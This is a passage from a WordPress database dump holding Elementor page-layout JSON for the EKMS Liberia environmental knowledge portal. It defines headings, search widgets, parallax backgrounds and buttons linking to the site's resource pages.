results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"news_resource\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6064,546,'_elementor_version','2.7.5'),(6065,546,'_elementor_template_type','wp-page'),(6066,546,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6068,547,'_wp_page_template','default'),(6069,547,'_elementor_edit_mode','builder'),(6070,547,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas 